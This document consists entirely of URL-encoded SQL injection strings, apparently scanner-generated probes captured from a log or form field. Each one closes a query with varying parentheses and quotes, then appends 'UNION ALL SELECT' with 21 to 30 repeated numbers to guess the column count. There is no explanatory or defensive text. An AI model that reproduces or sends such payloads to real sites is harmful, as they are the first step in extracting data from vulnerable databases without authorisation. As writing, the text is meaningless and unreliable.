-6653%29%20UNION%20ALL%20SELECT%207710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710%2C7710--%20 -8954%29%20UNION%20ALL%20SELECT%208320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320--%20 -1179%29%20UNION%20ALL%20SELECT%207391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391%2C7391--%20 -4671%29%20UNION%20ALL%20SELECT%206541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541--%20 -5427%29%20UNION%20ALL%20SELECT%209734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734%2C9734--%20 -4025%29%20UNION%20ALL%20SELECT%201317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317%2C1317--%20 -8062%29%20UNION%20ALL%20SELECT%209379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379%2C9379--%20 -3704%29%20UNION%20ALL%20SELECT%206140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140%2C6140--%20 -9606%29%20UNION%20ALL%20SELECT%208252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252%2C8252--%20 -5757%29%20UNION%20ALL%20SELECT%208101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101%2C8101--%20 -4928%29%20UNION%20ALL%20SELECT%206260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260%2C6260--%20 -9773%29%29%20UNION%20ALL%20SELECT%207449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449--%20 -3028%29%29%20UNION%20ALL%20SELECT%202989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989--%20 -1810%29%29%20UNION%20ALL%20SELECT%208541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541--%20 -1946%29%29%20UNION%20ALL%20SELECT%203393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393--%20 -4263%29%29%20UNION%20ALL%20SELECT%203508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508%2C3508--%20 -3605%29%29%20UNION%20ALL%20SELECT%201881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881%2C1881--%20 -8684%29%29%20UNION%20ALL%20SELECT%202484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484--%20 -1711%29%29%20UNION%20ALL%20SELECT%203709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709%2C3709--%20 -2856%29%29%20UNION%20ALL%20SELECT%201889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889--%20 -7845%29%29%20UNION%20ALL%20SELECT%204509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509--%20 -8981%29%29%29%20UNION%20ALL%20SELECT%202730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730--%20 -7428%29%29%29%20UNION%20ALL%20SELECT%208376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376--%20 -4855%29%29%29%20UNION%20ALL%20SELECT%209715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715--%20 -3308%29%29%29%20UNION%20ALL%20SELECT%209689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689%2C9689--%20 -1253%29%29%29%20UNION%20ALL%20SELECT%206616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616%2C6616--%20 -9739%29%29%29%20UNION%20ALL%20SELECT%207252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252--%20 -9983%29%29%29%20UNION%20ALL%20SELECT%203182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182--%20 -4599%29%29%29%20UNION%20ALL%20SELECT%201940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940--%20 -2556%29%29%29%20UNION%20ALL%20SELECT%201451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451--%20 -9735%29%29%29%20UNION%20ALL%20SELECT%203797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797%2C3797--%20 -1133%20UNION%20ALL%20SELECT%204457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457%2C4457--%20 -2519%20UNION%20ALL%20SELECT%205828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828--%20 -6472%20UNION%20ALL%20SELECT%209683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683--%20 -2761%20UNION%20ALL%20SELECT%206463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463%2C6463--%20 -3820%20UNION%20ALL%20SELECT%207251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251%2C7251--%20 -5773%20UNION%20ALL%20SELECT%206285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285%2C6285--%20 -1963%20UNION%20ALL%20SELECT%207375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375--%20 -8497%20UNION%20ALL%20SELECT%202268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268%2C2268--%20 -7018%20UNION%20ALL%20SELECT%207293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293--%20 -2648%20UNION%20ALL%20SELECT%202838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838%2C2838--%20 -5798%29%20WHERE%207229%3D7229%20UNION%20ALL%20SELECT%207229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229%2C7229--%20 -6297%29%20WHERE%205276%3D5276%20UNION%20ALL%20SELECT%205276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276--%20 -2579%29%20WHERE%204240%3D4240%20UNION%20ALL%20SELECT%204240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240--%20 -9338%29%20WHERE%201830%3D1830%20UNION%20ALL%20SELECT%201830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830%2C1830--%20 -2544%29%20WHERE%204658%3D4658%20UNION%20ALL%20SELECT%204658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658%2C4658--%20 -3089%29%20WHERE%203145%3D3145%20UNION%20ALL%20SELECT%203145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145%2C3145--%20 -6111%29%20WHERE%206013%3D6013%20UNION%20ALL%20SELECT%206013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013%2C6013--%20 -2296%29%20WHERE%206586%3D6586%20UNION%20ALL%20SELECT%206586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586%2C6586--%20 -9905%29%20WHERE%208624%3D8624%20UNION%20ALL%20SELECT%208624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624--%20 -7948%29%20WHERE%207620%3D7620%20UNION%20ALL%20SELECT%207620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620--%20 -3881%20WHERE%206133%3D6133%20UNION%20ALL%20SELECT%206133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133--%20 -3248%20WHERE%209838%3D9838%20UNION%20ALL%20SELECT%209838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838%2C9838--%20 -6506%20WHERE%201710%3D1710%20UNION%20ALL%20SELECT%201710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710--%20 -4262%20WHERE%204591%3D4591%20UNION%20ALL%20SELECT%204591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591%2C4591--%20 -6532%20WHERE%202489%3D2489%20UNION%20ALL%20SELECT%202489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489--%20 -3718%20WHERE%201585%3D1585%20UNION%20ALL%20SELECT%201585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585%2C1585--%20 -8770%20WHERE%204466%3D4466%20UNION%20ALL%20SELECT%204466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466%2C4466--%20 -3769%20WHERE%207582%3D7582%20UNION%20ALL%20SELECT%207582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582--%20 -1539%20WHERE%202999%3D2999%20UNION%20ALL%20SELECT%202999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999--%20 -3870%20WHERE%203356%3D3356%20UNION%20ALL%20SELECT%203356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356%2C3356--%20 -1742%27%29%20UNION%20ALL%20SELECT%206857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857%2C6857--%20 -5946%27%29%20UNION%20ALL%20SELECT%202217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217--%20 -2344%27%29%20UNION%20ALL%20SELECT%202443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443--%20 -2034%27%29%20UNION%20ALL%20SELECT%205190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190%2C5190--%20 -7113%27%29%20UNION%20ALL%20SELECT%202484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484%2C2484--%20 -2666%27%29%20UNION%20ALL%20SELECT%204259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259--%20 -9066%27%29%20UNION%20ALL%20SELECT%208326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326--%20 -8354%27%29%20UNION%20ALL%20SELECT%201353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353--%20 -3545%27%29%20UNION%20ALL%20SELECT%206591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591--%20 -7525%27%29%20UNION%20ALL%20SELECT%207880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880%2C7880--%20 -7494%27%20UNION%20ALL%20SELECT%206400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400%2C6400--%20 -8414%27%20UNION%20ALL%20SELECT%205521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521%2C5521--%20 -6712%27%20UNION%20ALL%20SELECT%205732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732%2C5732--%20 -1211%27%20UNION%20ALL%20SELECT%209890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890%2C9890--%20 -2607%27%20UNION%20ALL%20SELECT%202914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914%2C2914--%20 -9600%27%20UNION%20ALL%20SELECT%208933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933%2C8933--%20 -9228%27%20UNION%20ALL%20SELECT%204588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588%2C4588--%20 -2320%27%20UNION%20ALL%20SELECT%205729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729%2C5729--%20 -6414%27%20UNION%20ALL%20SELECT%202424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424--%20 -8655%27%20UNION%20ALL%20SELECT%206399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399--%20 -1367%22%20UNION%20ALL%20SELECT%208825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825--%20 -6014%22%20UNION%20ALL%20SELECT%203216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216--%20 -3247%22%20UNION%20ALL%20SELECT%202199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199--%20 -2198%22%20UNION%20ALL%20SELECT%206407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407%2C6407--%20 -9258%22%20UNION%20ALL%20SELECT%209324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324--%20 -2432%22%20UNION%20ALL%20SELECT%206450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450%2C6450--%20 -5784%22%20UNION%20ALL%20SELECT%203287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287--%20 -2926%22%20UNION%20ALL%20SELECT%206152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152--%20 -3167%22%20UNION%20ALL%20SELECT%204833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833%2C4833--%20 -6320%22%20UNION%20ALL%20SELECT%206542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542--%20 -8647%27%29%20UNION%20ALL%20SELECT%208321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321%2C8321--%20 -5520%27%29%20UNION%20ALL%20SELECT%206753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753%2C6753--%20 -2123%27%29%20UNION%20ALL%20SELECT%206051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051--%20 -2250%27%29%20UNION%20ALL%20SELECT%203700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700--%20 -6903%27%29%20UNION%20ALL%20SELECT%202256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256--%20 -5390%27%29%20UNION%20ALL%20SELECT%202156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156--%20 